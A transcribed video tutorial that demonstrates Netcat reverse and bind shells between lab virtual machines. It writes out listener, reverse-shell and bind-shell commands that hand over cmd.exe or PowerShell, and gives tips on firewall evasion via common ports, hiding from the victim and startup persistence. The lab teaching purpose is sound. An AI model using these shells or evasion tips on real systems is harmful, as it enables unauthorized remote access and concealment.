everybody, and welcome back. It's me, cyberwarrior, and here today, what I want to talk to you about in a more technical video is actually Netcat and bind shells and reverse shells. So, to get us started, what I have up is the Parrot distro that I've been using before, and it's actually in my Parrot Sec playlist. So, if you want to go take a look at that, feel free. It'll get you set up the exact same way I am. And then I also have on my other virtual machine Windows Flare, generally used for more reverse engineering malware. It is a distribution by FireEye. However, for today's lesson, we're going to use it so that we could show the difference of a reverse shell and a bind shell. So, a reverse shell is when you have a listener on your attacking machine, all right, and you execute whether it be a Metasploit payload or commands through a web shell or commands through just a regular shell to send Netcat or some other application, whether it be Python, PHP, any other type of scripting language, and it initiates a connection back to you, to your listener. A bind shell is when you have the listener on the victim machine and you then initiate the connection to it. So there are different reasons for different shells. So some firewalls and some connections won't allow inbound traffic. So at that point you need the reverse shell, because what that does is that has the attacking or the victim machine initiate the connection first. So if the firewall is blocking the internal connection, a lot of times the way a lot of your firewalls are configured, as long as that connection starts and is initialized from inside the network, then it goes through. Now, of course, ports and things like that come into play, and we'll discuss that a little bit further. And then with a bind shell, if you're not allowed out through, say, port 443 or 22, but you're allowed in, then you would do a bind shell, and you, from the attacking machine, would initialize the connection. So what I generally do when I do my shells is I use common ports. 443, 22, 80, 80, things like that. 21, depending on what's running and what's not. And the reason for that is your firewalls are going to be configured a lot of times to allow your common ports, whereas they're going to block ports like 4444, 4443, the list goes on, 2222. Essentially anything that is not a common port will be blocked, either inbound, outbound, or both. So I use common ports. For one, it hides the connection, especially if you set things up in more of an encrypted method, via HTTPS going over 443, 22 going over SSH. There's ways that you can encrypt the traffic so that it looks more like the communications that are supposed to be going over to that port to begin with. Now, if you have an advanced firewall, again, different story, but if you have something like a next-gen firewall that decrypts traffic anyways, then you're kind of out of luck and you're going to be seen as is. But as long as you aren't worried about that aspect, just worried about the communication, then your common ports are generally what you want to go with. So let's get started here. And what I'm going to do is I'm going to first show a reverse shell. And so to start that off, if I go here and I'm going to say nc-h, and the reason I'm going to do -h is because I have a set of options that I've always used for Netcat, and I want to show you what each of them mean. So we pull it up here and we're looking. Now the first one that I use is -l, and what -l does is it puts it into listen mode. So this is essentially going to open up a port on your machine to listen, same as if you had a web server or something like that. The next thing is -n, and I do this because right now I'm only using IP addresses. Now, if you're using DNS names and wanted to be able to hit a DNS, resolve to a DNS server, then you would use DNS. But because everything right now is in a training environment, I'm using all IP addresses, so that's what the -n comes in for. -p is going to be your port, so that's when you set what port you're listening on. And again, for this demonstration and for the fact that a lot of times it's open, we're going to use port 443. And then finally, -v is your verbose mode, so it's going to show you all those connections. And before we do this, we need to know our IP addresses. So we're going to go here. And we've got .26 on this one. And just so I'm aware, let's pull this up. Config-A. Oh, that's right. Apologies. Where'd it go? Oh, here it is. Okay, and for some reason, my adapter switched back to a IP address or a network connection that I'm not using. So let's fix that real quick. I had it fixed. I don't know why. Yeah, I don't know why it's not working or why it got changed back. But essentially, let me move this over here so you can see. So on here, due to the way the networking is, and if I want the right port, so what we want to do is go to Bridge. What Bridge will do is it will actually put it on the same network that the rest of my computers are on. So IP no, I don't care about that. Config. There we go. All right, so .35. So now we know both IP addresses. So we're gonna go back here, and first we're gonna set up our listener. So we're gonna do clear. Oops, clear. And we're going to say nc-lvnp443. Now, if you were worried about multiple, multiple IP addresses or NIC cards or something like that, then you would go in, look at your options, and tell it which connection or which IP to use. In this case, actually, we got to use sudo because I'm on parrot. In this case, I am actually going to bind to all of them. So any port, any traffic coming in on any port to, or any traffic coming into any IP address on port 443, this is listening for. So if we had a shell, now again, I'm just showing you as if I'm already on the box or have a remote desktop or however you want to consider it. And you can have CMD, you can have different exploits, but we'll say somebody initiated this. Now, keep in mind, on this box, what I have is an older version of Netcat. And the reason for that is it enables the -E option, which is actually execute or shoot. So this nc.exe-h -E inbound program to execute. Now, early on, this was included, and a lot of people took advantage of it in a lot of different ways. And we're going to use one of those ways right now. In later versions and newer versions of Netcat, that is missing. They actually removed that option, so now you have to go about different ways to executing shells with Netcat. And it's still possible. I've done it numerous occasions, but for now, we're just going to use the easy way because -E is on here. And we're going to do that. So what we do is we do nc.exe 192.168.86. And you'll notice for this, we don't actually have to put the -P in because when you're doing a reverse shell, you're sending it out and you're telling it, it's kind of like SSH or anything else like that. You're saying, all right, use this program to this IP to this port. Really, you only use that -P if you're listening. So that's why we're excluding it. So, and it even says here, connect to somewhere, NC, any options, host name, port. So, what was my IP again? File, new tab. And I know you guys can't see this real well. 8626, okay. 6, 443. Now, before I hit enter, let's pull up this other tab that you can see on. And what we're going to see here, and let me move this so you can see the connection when I hit enter. Whoops, almost forgot. cmd.exe. And what you could do is you could actually execute cmd.exe, PowerShell, or any other executable command that you wanted to run when you connect. But as you'll see here, if we go back over, we can actually see that we see the Windows version, and we automatically are connected to the C drive. So if I go here and type in dir, I get the directory of this machine. And I can actually go up and we can pull up another command prompt, cmd, and let's go to the directory that we're in, and you can even see there the username and everything, and we can match these. So wct fc3d, yep, there it is. There's a start.bat, nc.exe, there it is. So we're actually on the local machine. So that is your reverse shell. Now again, sometimes that works, sometimes it doesn't. It really depends on how firewalls are configured, roles, anti-malware, and antivirus and things like that. So then we go to exit. Now we're no longer listening. We do Control C, and we've closed out of it. So if we were to pull up task list, we would no longer see this running, or task manager, and you will see nc.exe is not running anywhere. So good. All right, Netcat's been canceled. All right, so now, like I said, we're going to talk about a bind shell. Now, like I said, a bind shell is almost as if you're hosting a web server or anything like that. It's the same concept. You have Netcat listening on a port, and when it connects, it's going to do something. For the same purpose, because we want to execute cmd.exe, you will see that I use the same -e switch, and then we're going to move our listener over here. So we're going to do nc.exe listen verbose and port 443, and then -e cmd. Actually, for this case, we're going to switch it up. I believe PowerShell works on here. All right. And we're going to allow access. Come on. All right, cool. So we're listening. So then we're going to come up here, and this one was 35, I believe. We're going to say nc 192.168.86.35.443. If that's the right port. Was that the right port? It is the right port. So 192.168.86.35.443. Why am I not getting a connection? Ping 192.168.86.35. Oh, that'd be why. I can't talk to it for some reason. So, I'm not allowing inbound traffic. That would be why. So I have a firewall running that is blocking inbound traffic. So we got to fix that. So let's go advanced. No, let's do firewall. And advanced settings. And so this is a perfect example of bind shell not allowing the inbound connection. You saw the initial shell allowed me to execute a connection outbound, right? So it allowed me to initiate the connection from Windows to my Parrot box, but it won't allow me to initiate the connection from Parrot to Windows. So we're going to say inbound roles and properties. Allow the connection. All right. Protocols and ports. That'll be why. Any. Cool. And close. Whoops. I bet you that didn't fix. So I'm going to go back here. Let's try properties again. Then, oh, no. Any. Whoops. Come here. Any apply. Prime path we've set. Oh, man. Gotta love it. Protocol type. TCP. All ports, all ports. Apply. Okay. Then properties. Name, description, enabled, allow the connection, advanced. Okay, protocols and ports. Oh, I already had it. So, programs and services. This program. Okay. Okay. So, why are we not allowed in? You know what? We're going to make it easy. Just for now, we're going to turn this off. Turn off. Turn off. Okay. And we'll work around that later. Because ping. There we go. Now I've got inbound. Alright. So now if I do this, we're still getting refused. Why am I getting refused now? Firewall is off. Windows security. Let's see what we got going on now, guys. Nope. Why am I not? You know what? We're going to try something different. Let's try port 80. Oh, that time it worked. Hey, there we go. Alright, I had to close it and redo it. Learn something new every day. And again, the reason I don't cut out these errors, the reason I don't, I don't edit the video to, to erase the mistakes, is because everybody has problems going along the line, right? And everybody has different troubleshooting techniques that they just don't know. So I leave them in my videos for the purpose of you can learn and see what's going on. Now, to make things easier, I'm not here to teach you how to use firewalls. I'm not here to teach you, what rules and alerts to put in. The purpose of this video is to show you the difference in shells, so we just turn the firewall off. Maybe in another video later on, we'll get into configuring Windows firewalls, but I'm not really a firewall person, so I really doubt that I'll be getting into one of those videos anytime soon. So, as you can see here, though, because we ended up changing the executable from CMD to PowerShell, we now have, and you can see from the PS here, a PowerShell shell on our attacker box. So, if I wanted to do invoke, you'll see it wants to know, what do I want to invoke? And it's like, oh, I don't know what this is. It's not a commandlet. So we know we're in PowerShell. And you can see here that it's connected. So that is how you do a bind shell and a reverse shell. Now again, and you saw the problem with the firewall. I couldn't go inbound with any traffic to this network. Alright. I didn't pay attention to what type of domain or home network or whatever it put it on. But I had no way to do inbound traffic flow to my Windows box, which is why we turned the firewall off. However, I was able to go outbound. So that initial reverse shell worked like a charm. It was the bind shell that didn't. And so when you're having problems, whether you're doing a pen test and you notice an issue, or you're doing your PWK labs or virtual hacking labs or anything like that, hack the box, whatever the case may be, and you notice you're having issues with reverse shells, as that tends to be people's first go-to. First, check your port. If you're using something obscure, which especially in a lab environment you don't need to do, then first change your port. Try 443, try 22, 21, 80, 80, 80. Try your common ports that are usually open on any firewall. If that fails, you can try an obscure port and see if maybe something got missed. But if you don't want to do that, then your next option is, if you already have the ability to run Netcat or PwnCat or whatever the case may be, I would do a bind shell, right? So switch which one you're using. So tell the shell that you're going to listen You want it in verbose, which you don't need. I just always do so I can see all the details. And you're going to use whatever port, and you want to execute this command, whether it be cmd.exe, powershell.exe, or bin bash or bin sh, whatever the case may be. And then, go back to your attacking machine and try to connect to it as if you would do anything else. So those are your two options. Now, keep in mind when you actually get into an environment and you're doing different things, especially if you're in like a remote session, a VNC session, anything where what you're seeing can actually be seen on the victim's machine, you may not want to have verbose output. You may not want these things, because you're probably not going to see it. And if you can see it because, like I said, you're through VNC or RDP or whatever, you probably don't want that person to see what you're doing. Just a thought. And then beyond that, again, learn from your mistakes and realize the difference between the two types of shells. So if somebody says, hey, I need a reverse shell, that means I need to initiate the connection from the victim machine. If they say I want a bind shell, you're initiating the communication from the attacking machine. And that's really how you think about it. Or when you think of bind, you think of you bind the program to a port. So you're binding nc.exe to port 443. And then you're giving the connection from your attacking machine in. And that can work out in one of two ways. If you're trying to go for persistence, then you can actually set it up to always bind and listen. But again, you can do the same thing with a reverse shell. You can leave the listener up on your computer. Although if it's listening and then loses connection, it's not going to get the connection back. So maybe your bind shell works out better. Because if you have a bind shell, if your connection drops and you're working on persistence and you have a bind shell that runs on reboot, right? So you have it in startup and you've noticed you've lost the shell, then all you got to do is reinitialize the shell. So bind shells tend to work a little better for persistence. Again, you can do reverse shells. Those tend to work better utilizing handlers like the multi-handler from Metasploit, in which case anytime it restarts and recalls back, it'll actually initiate a new shell for you. Unlike Netcat, where if you lose that shell, if you don't start a new listener, then you're out of luck. So you won't know that it's trying to call back home. So I hope you found this video informative. Again, I'm the Cyber Warrior, and I'm here to help you out any chance I get. Please, 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 if you like this video, if you like my other videos, again, take a look at the Parrot Security playlist, take a look at my soft skills playlist, or any of the other videos I have out there to help you along your way and along your career path within cybersecurity. Go ahead, hit the subscribe button down below. Hit that bell so you get alerted anytime I make a new video. Leave a comment, hit that thumbs up for a like, and feel free to get a hold of me anytime you need on Twitter or Discord. I'm always available. Have a great one.